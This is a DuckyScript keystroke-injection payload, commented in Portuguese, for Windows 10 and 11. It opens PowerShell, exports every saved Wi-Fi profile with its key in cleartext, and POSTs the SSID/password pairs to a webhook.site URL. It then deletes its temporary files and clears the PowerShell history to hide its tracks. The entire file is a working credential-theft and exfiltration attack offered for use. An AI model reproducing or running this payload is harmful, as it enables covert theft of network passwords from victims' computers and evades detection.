REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-to-WebHook                |
REM # Author       : Uno                                              |
REM # Description: Send wifi PWD to https://webhook.site/75342571-78da-45fc-8f61-caf01ffc1f5f            |
REM # Category     : Credentials                                      |
REM # Target       : Windows 10-11                                    |
REM # Version      : 1.0                                              |
REM #                                                                 |
REM ###################################################################

REM *************** ABRE POWER SHELL  *****************
DELAY 250
GUI r
DELAY 250
STRING powershell
ENTER
DELAY 2050
REM *************** ABRE POWER SHELL *****************
REM ***************** EXECUTA O ENVIO DAS SENHAS *********************
STRING $p=Join-Path $env:TEMP 'p';New-Item -Path $p -ItemType Directory -Force -EA SilentlyContinue|Out-Null;Set-Location $p -EA SilentlyContinue;netsh wlan export profile key=clear|Out-Null;$r=Get-ChildItem -Filter "*.xml"|%{$x=[xml](Get-Content $.FullName -EA SilentlyContinue);if($x.WLANProfile.Name -and $x.WLANProfile.MSM.Security.SharedKey.KeyMaterial){[PSCustomObject]@{SSID=$x.WLANProfile.Name;Password=$x.WLANProfile.MSM.Security.SharedKey.KeyMaterial}}};$f=($r|%{"$($.SSID) >> $($_.Password)"}) -join "`n";$content="r`n$f`n``````";$bytes=[System.Text.Encoding]::UTF8.GetBytes($content);Invoke-RestMethod -Uri 'https://webhook.site/75342571-78da-45fc-8f61-caf01ffc1f5f' -Method Post -Body $bytes -ContentType 'text/plain; charset=utf-8' -EA SilentlyContinue;Set-Location .. -EA SilentlyContinue;Remove-Item $p -Recurse -Force -EA SilentlyContinue
ENTER
DELAY 2050
REM ***************** EXECUTA O ENVIO DAS SENHAS *********************
REM ***************** LIMPAR RASTROS E SAIR *********************
STRING [Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory()
ENTER
DELAY 250
STRING exit
ENTER
DELAY 250
REM ***************** LIMPAR RASTROS E SAIR *********************